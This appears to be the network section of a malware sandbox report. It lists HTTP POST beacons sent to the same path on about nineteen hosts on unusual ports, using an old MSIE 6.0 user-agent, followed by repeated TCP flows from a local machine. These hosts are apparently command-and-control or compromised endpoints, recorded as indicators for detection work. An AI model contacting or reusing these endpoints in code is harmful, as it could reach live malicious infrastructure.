HTTP POSThttp://173.230.130.167:8080/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://terreal.com.my:65535/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mlmsoftware.com.my:65535/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tgp.my:65535/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://aquionics.net:2525/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.net:65535/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tgp.com.my:65535/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://91.121.12.127:81/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://lacubana.es:8585/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://amaru.me:65535/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://94.247.28.29:8080/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.jp:65535/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://formagrafic.com:8585/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://andyknife.com:65535/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://macrobiotics-japan.com:65535/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://futbolenelbar.com:65535/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://5.199.165.160:2525/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://entramuntanats.org:65535/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ddiss.com:8585/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1034 ➝ 103.18.247.250:2525
Flows TCP192.168.1.1:1035 ➝ 219.94.235.33:8081
Flows TCP192.168.1.1:1036 ➝ 173.230.130.167:8080
Flows TCP192.168.1.1:1037 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1038 ➝ 43.252.215.197:65535
Flows TCP192.168.1.1:1039 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1040 ➝ 103.18.247.250:2525
Flows TCP192.168.1.1:1041 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1042 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1043 ➝ 91.121.12.127:81
Flows TCP192.168.1.1:1044 ➝ 95.215.62.77:8585
Flows TCP192.168.1.1:1045 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1046 ➝ 94.247.28.29:8080
Flows TCP192.168.1.1:1047 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1048 ➝ 95.215.62.77:8585
Flows TCP192.168.1.1:1049 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1050 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1051 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1052 ➝ 5.199.165.160:2525
Flows TCP192.168.1.1:1053 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1054 ➝ 54.175.122.20:8585
Flows TCP192.168.1.1:1055 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1056 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1057 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1058 ➝ 103.18.247.250:2525
Flows TCP192.168.1.1:1059 ➝ 219.94.235.33:8081
Flows TCP192.168.1.1:1060 ➝ 173.230.130.167:8080
Flows TCP192.168.1.1:1061 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1062 ➝ 43.252.215.197:65535
Flows TCP192.168.1.1:1063 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1064 ➝ 103.18.247.250:2525
Flows TCP192.168.1.1:1065 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1066 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1067 ➝ 91.121.12.127:81
Flows TCP192.168.1.1:1068 ➝ 95.215.62.77:8585
Flows TCP192.168.1.1:1069 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1070 ➝ 94.247.28.29:8080
Flows TCP192.168.1.1:1071 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1072 ➝ 95.215.62.77:8585
Flows TCP192.168.1.1:1073 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1074 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1075 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1076 ➝ 5.199.165.160:2525
Flows TCP192.168.1.1:1077 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1078 ➝ 54.175.122.20:8585
Flows TCP192.168.1.1:1079 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1080 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1081 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1082 ➝ 103.18.247.250:2525
Flows TCP192.168.1.1:1083 ➝ 219.94.235.33:8081
Flows TCP192.168.1.1:1084 ➝ 173.230.130.167:8080
Flows TCP192.168.1.1:1085 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1086 ➝ 43.252.215.197:65535
Flows TCP192.168.1.1:1087 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1088 ➝ 103.18.247.250:2525
Flows TCP192.168.1.1:1089 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1090 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1091 ➝ 91.121.12.127:81
Flows TCP192.168.1.1:1092 ➝ 95.215.62.77:8585
Flows TCP192.168.1.1:1093 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1094 ➝ 94.247.28.29:8080
Flows TCP192.168.1.1:1095 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1096 ➝ 95.215.62.77:8585
Flows TCP192.168.1.1:1097 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1098 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1099 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1100 ➝ 5.199.165.160:2525
Flows TCP192.168.1.1:1101 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1102 ➝ 54.175.122.20:8585
Flows TCP192.168.1.1:1103 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1104 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1105 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1106 ➝ 103.18.247.250:2525
Flows TCP192.168.1.1:1107 ➝ 219.94.235.33:8081
Flows TCP192.168.1.1:1108 ➝ 173.230.130.167:8080
Flows TCP192.168.1.1:1109 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1110 ➝ 43.252.215.197:65535
Flows TCP192.168.1.1:1111 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1112 ➝ 103.18.247.250:2525
Flows TCP192.168.1.1:1113 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1114 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1115 ➝ 91.121.12.127:81
Flows TCP192.168.1.1:1116 ➝ 95.215.62.77:8585
Flows TCP192.168.1.1:1117 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1118 ➝ 94.247.28.29:8080
Flows TCP192.168.1.1:1119 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1120 ➝ 95.215.62.77:8585
Flows TCP192.168.1.1:1121 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1122 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1123 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1124 ➝ 5.199.165.160:2525
Flows TCP192.168.1.1:1125 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1126 ➝ 54.175.122.20:8585
Flows TCP192.168.1.1:1127 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1128 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1129 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1130 ➝ 103.18.247.250:2525
Flows TCP192.168.1.1:1131 ➝ 219.94.235.33:8081
Flows TCP192.168.1.1:1132 ➝ 173.230.130.167:8080
Flows TCP192.168.1.1:1133 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1134 ➝ 43.252.215.197:65535
Flows TCP192.168.1.1:1135 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1136 ➝ 103.18.247.250:2525
Flows TCP192.168.1.1:1137 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1138 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1139 ➝ 91.121.12.127:81
Flows TCP192.168.1.1:1140 ➝ 95.215.62.77:8585
Flows TCP192.168.1.1:1141 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1142 ➝ 94.247.28.29:8080
Flows TCP192.168.1.1:1143 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1144 ➝ 95.215.62.77:8585
Flows TCP192.168.1.1:1145 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1146 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1147 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1148 ➝ 5.199.165.160:2525
Flows TCP192.168.1.1:1149 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1150 ➝ 54.175.122.20:8585
Flows TCP192.168.1.1:1151 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1152 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1153 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1154 ➝ 103.18.247.250:2525
Flows TCP192.168.1.1:1155 ➝ 219.94.235.33:8081
Flows TCP192.168.1.1:1156 ➝ 173.230.130.167:8080
Flows TCP192.168.1.1:1157 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1158 ➝ 43.252.215.197:65535
Flows TCP192.168.1.1:1159 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1160 ➝ 103.18.247.250:2525
Flows TCP192.168.1.1:1161 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1162 ➝ 103.18.247.250:65535
Flows TCP192.168.1.1:1163 ➝ 91.121.12.127:81
Flows TCP192.168.1.1:1164 ➝ 95.215.62.77:8585
Flows TCP192.168.1.1:1165 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1166 ➝ 94.247.28.29:8080
Flows TCP192.168.1.1:1167 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1168 ➝ 95.215.62.77:8585
Flows TCP192.168.1.1:1169 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1170 ➝ 219.94.235.33:65535
Flows TCP192.168.1.1:1171 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1172 ➝ 5.199.165.160:2525
Flows TCP192.168.1.1:1173 ➝ 95.215.62.77:65535
Flows TCP192.168.1.1:1174 ➝ 54.175.122.20:8585

Raw Pcap

Strings